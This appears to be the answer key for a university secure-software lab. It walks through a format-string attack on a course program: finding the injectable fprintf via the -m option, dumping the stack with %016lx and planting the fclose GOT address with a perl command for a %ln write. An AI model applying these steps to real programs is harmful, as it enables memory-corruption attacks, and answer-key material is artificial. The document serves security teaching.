University of Minnesota
Development of Secure Software Systems

CSci 4271 Lab 7: auditing answers

Which location to attack, source of the format string

There are 36 calls to printf, fprintf, or snprintf in this program. Most of them can be ruled out immediately as targets for format string injection, because their format strings (the first argument for printf, the second argument for fprintf, or the third argument for snprintf) are constant strings. If a format string is a constant, there is no way for an attacker to control it. There are two calls to fprintf that you should look at more closely (the compiler would have pointed these out if we hadn't suggested you disable its warnings about format strings). One is on line 157, where the format string is a function parameter named enoent_msg, and the other is on line 500, where it is a global variable named message.
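
The difference between a constant and a non-constant format string can be seen in a small sketch. This is not code from the lab program: the function names format_constant and format_variable are made up for illustration, and the pragmas stand in for the warning-disabling compiler flags mentioned above (assuming GCC or Clang).

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Silence the warnings that would normally flag the second function. */
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"

/* Safe pattern: the format string is the constant "%s", so text is
 * treated purely as data. Hypothetical helper, for illustration only. */
int format_constant(char *out, size_t size, const char *text)
{
    assert(out != NULL && text != NULL);
    return snprintf(out, size, "%s", text);
}

/* Risky pattern: text itself is the format string, so every '%' in it
 * is interpreted by snprintf. Hypothetical helper, for illustration. */
int format_variable(char *out, size_t size, const char *text)
{
    assert(out != NULL && text != NULL);
    return snprintf(out, size, text);
}
```

Given the text 100%% done, format_constant copies both percent signs unchanged, while format_variable interprets %% and produces a single percent sign. The %% specifier consumes no arguments, so this particular input is safe to experiment with; specifiers such as %lx or %n in the second function would read arguments that were never passed.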

To distinguish which of the dangerous-looking locations is really subject to attack, you need to look at where in the program their format string arguments are coming from; you also need this information to carry out an attack. The call on line 157 turns out not to be exploitable, because if you look at the callsites of the chdir_or_die function, the enoent_msg parameter is passed a constant string as an argument in all cases. (In some cases the argument is a concatenation of a string constant with a preprocessor macro defined to be another constant, but this concatenation happens at compilation time and neither part can be controlled by an attacker.)

By contrast, the global variable message does turn out to be controllable by an attacker. It starts out as a null pointer, and the fprintf call doesn't happen if it stays null. But on lines 92-97 you can see that if a -m flag is supplied to the program on the command line, the next word on the command line becomes the value of message. The output of the fprintf call goes to a log file rather than to the standard output, but you can check your understanding by trying different values of the -m command-line option and seeing how they are reflected in the log file. In particular you should see that format specifiers in the option value are interpreted, which is the indicator of format-string injection.
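
The data flow described above, from the command line to the format string, might look roughly like the following. This is a hedged reconstruction, not the program's actual code: parse_message_option and log_message are hypothetical names, and only the global message, the -m flag, and the null check come from the description above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Silence the warning about the non-constant format string below. */
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"

/* Stand-in for the program's global; it starts out as a null pointer. */
static const char *message = NULL;

/* Hypothetical option scan: the word following "-m" becomes message. */
void parse_message_option(int argc, char **argv)
{
    assert(argv != NULL);
    for (int i = 1; i + 1 < argc; i++) {
        if (strcmp(argv[i], "-m") == 0) {
            message = argv[i + 1];
            i++; /* skip the option's value */
        }
    }
}

/* Hypothetical logging step: nothing is printed while message is null;
 * otherwise the attacker-supplied word is used as the format string. */
int log_message(FILE *log)
{
    assert(log != NULL);
    if (message == NULL)
        return 0;
    return fprintf(log, message); /* the injection point */
}
```

Tracing a value from argv to the first non-constant argument of a printf-family call in this way is the same check you perform by hand when auditing.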

Attacker-controlled stack contents

In addition to the format string, the other thing that an attacker must be able to influence for a format string attack is a value that the printf-family function will interpret as one of its arguments, specifically the one corresponding to the %n format specifier. In some cases this could be one of the subsequent program-supplied arguments, but in this case there aren't any, so it needs to be a different value from the stack. Recall that even though arguments on x86-64 are usually passed in registers, functions like printf copy their arguments into an array in their stack frame to be able to iterate over them. If the attacker supplies more format specifiers than the program passed arguments, the function will read past the end of this array and interpret other values from older parts of the stack as if they were further arguments. In this program, the vulnerable call to fprintf is in main, so the relevant locations are the contents of main's stack frame, such as local variables, and beyond that the startup state of the program, like command-line arguments and environment variables. The one that is most convenient for an attacker to control here is the local variable header, which the program reads directly from the first four bytes of the file being "printed", followed by four zero bytes.
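
As a reminder of what the %n family does when it is used legitimately, here is a minimal sketch. The function count_after_padding is a made-up name, and the example assumes a C library such as glibc that supports %n in constant format strings (some platforms restrict or disable it).

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Print `width` characters of padding, then let %ln store the running
 * character count through the pointer argument that corresponds to it.
 * Hypothetical helper, for illustration only. */
long count_after_padding(int width)
{
    char scratch[256];
    long written = -1;

    assert(width >= 0 && width < (int)sizeof scratch);
    snprintf(scratch, sizeof scratch, "%*s%ln", width, "", &written);
    return written;
}
```

Here the pointer consumed by %ln is a real argument, so the write lands in the local variable written. In the attack, no such argument is passed, and the pointer is instead whatever stack value lines up with the specifier, which is why the attacker needs to control that value.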

Because header is part of main's stack frame, it is not too far above where fprintf would normally expect its arguments. If you add enough %016lx specifiers, you should see that one of them is printing a 64-bit value where the high four bytes are 0, and the low four bytes are the first four bytes of the input file (because x86-64 is little-endian, the bytes from the file are actually the ones at the lower addresses in memory, and when printed as a number they are backwards from the order they appear as bytes in the file). Keep track of this format specifier, because it's the one you'll need to replace with %ln.
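
Typing many specifiers by hand is error-prone, so a small helper can generate the stack-dumping string to pass to -m. This is only a sketch: build_dump_format is a hypothetical name, and the dot after each specifier is an assumed separator chosen to make the logged values easy to count.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Fill out with `count` copies of "%016lx." and return the resulting
 * length, or -1 if the buffer is too small. Hypothetical helper. */
int build_dump_format(char *out, size_t size, int count)
{
    static const char spec[] = "%016lx.";
    const size_t spec_len = sizeof spec - 1;
    size_t total;

    assert(out != NULL && count >= 0);
    total = (size_t)count * spec_len;
    if (total + 1 > size)
        return -1;
    for (int i = 0; i < count; i++)
        memcpy(out + (size_t)i * spec_len, spec, spec_len);
    out[total] = '\0';
    return (int)total;
}
```

With the dots as separators, the position of the field in the log file that shows the file's first four bytes is the position of the specifier you will later replace with %ln.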

To control this value, which is the "where" of our write-what-where attack, we need to create a file whose contents are the address of the thing we want to overwrite (in little-endian byte order): the GOT entry for fclose, at 0x405060. You can use any of your favorite ways of creating a file with binary data:

% perl -e 'print "\x60\x50\x40\x00"' >got-addr.in
% hd got-addr.in
00000000  60 50 40 00                                       |`P@.|
00000004

(In fact, because the values 0x60, 0x50, and 0x40 are all printable, in this case you could also make a working file just with echo -n.) You should be able to confirm by using this as the input file and with your stack-dumping format string that the value we're trying to control changes to 0000000000405060.
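
If you would rather check the byte order in code, the following sketch writes an address file and then computes the value that the stack dump should show for it. Both function names are hypothetical, and the reading function only models the description of header above (four file bytes at the low addresses, followed by four zero bytes); it is not taken from the program.

```c
#include <assert.h>
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Write the four bytes of addr to path, least significant byte first,
 * matching x86-64 byte order. Returns 0 on success, -1 on failure. */
int write_address_file(const char *path, uint32_t addr)
{
    unsigned char bytes[4];
    size_t n;
    FILE *f;

    assert(path != NULL);
    for (int i = 0; i < 4; i++)
        bytes[i] = (unsigned char)(addr >> (8 * i));
    f = fopen(path, "wb");
    if (f == NULL)
        return -1;
    n = fwrite(bytes, 1, sizeof bytes, f);
    if (fclose(f) != 0 || n != sizeof bytes)
        return -1;
    return 0;
}

/* Model of header: the file's first four bytes form the low half of a
 * 64-bit value whose high half is zero. The value is formatted the way
 * a %016lx specifier would print it. Returns 0 on success. */
int format_header_value(const char *path, char *out, size_t size)
{
    unsigned char bytes[4];
    uint64_t value = 0;
    size_t n;
    FILE *f;

    assert(path != NULL && out != NULL);
    if (size < 17)
        return -1;
    f = fopen(path, "rb");
    if (f == NULL)
        return -1;
    n = fread(bytes, 1, sizeof bytes, f);
    fclose(f);
    if (n != sizeof bytes)
        return -1;
    for (int i = 0; i < 4; i++)
        value |= (uint64_t)bytes[i] << (8 * i);
    snprintf(out, size, "%016" PRIx64, value);
    return 0;
}
```

Calling write_address_file with 0x405060 produces the same four bytes as the perl command, and format_header_value on that file yields the string 0000000000405060.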